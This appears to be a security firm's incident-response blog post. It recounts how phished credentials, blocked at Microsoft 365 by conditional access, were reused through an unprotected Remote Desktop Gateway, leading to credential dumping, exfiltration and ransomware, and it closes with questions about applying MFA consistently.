A recent incident we investigated highlights a critical point: protecting one entry point does not secure your entire environment.
Phishing remains one of the most effective initial access techniques used by threat actors today. Many organisations take comfort in the fact that modern email platforms, particularly Microsoft 365, offer strong protections such as multi-factor authentication (MFA), conditional access, and suspicious login detection.
However, a recent incident we investigated highlights a critical point: protecting one entry point does not secure your entire environment.
The Initial Phish and a Partial Success
In this case, a user received a phishing email containing a link to what appeared to be a legitimate login page. The page was designed to harvest credentials, which were successfully captured by the threat actor.
Shortly after, suspicious login attempts were observed against the user’s Microsoft 365 account. These attempts were unsuccessful, as existing conditional access controls prevented the threat actor from authenticating.
At this stage, it would have been easy to assume the organisation had dodged a bullet. However, the successful harvesting of credentials represents a wider risk. Once captured, credentials can be reused or passed to other threat actors.
The Reality: Credentials Were Still Valid
While Microsoft 365 protections performed as intended, the user’s credentials were still valid elsewhere within the organisation’s infrastructure.
The credentials were then used to access the environment via an externally exposed Remote Desktop Gateway (RDG) service. Critically, this service allowed authentication using the compromised username and password without any additional verification.
This activity could indicate a single threat actor progressing through the intrusion. However, it is also consistent with a known pattern where credentials obtained through phishing are shared or sold. In these cases, an initial access broker may obtain valid credentials and pass them to another group specialising in lateral movement, data exfiltration, and ransomware deployment.
This access provided a threat actor with a foothold on the user’s workstation, which had direct access to the organisation’s only server.
From Access to Compromise
Once inside the environment, the threat actor proceeded to:
- Deploy credential harvesting tools such as Mimikatz and LaZagne
- Enumerate the network using tools including NetScan
- Compromise privileged accounts
- Establish persistence via scheduled tasks and reverse SSH tunnels
- Exfiltrate data using a cloud synchronisation tool (MEGAsync)
- Deploy ransomware across the environment
What began as a single set of phished credentials ultimately resulted in full network compromise and ransomware deployment.
Key Takeaway: Security Must Be Holistic
This case is a strong reminder that security controls cannot be viewed in isolation.
Yes, Microsoft 365 protection worked. But the threat actor did not need it to fail.
Instead, they pivoted to another access path where the same credentials were accepted without equivalent protections.
Questions Every Organisation Should Be Asking
When reviewing your security posture, it is not enough to ask; “Do we have MFA on email?”
You should also be asking:
- Where else can credentials be used?
- Are all remote access services protected by MFA?
- Do any legacy systems or gateways bypass modern security controls?
- Are authentication standards consistent across the environment?
In this case, the weakest link was not email. It was an alternative access service that relied on the same credentials.
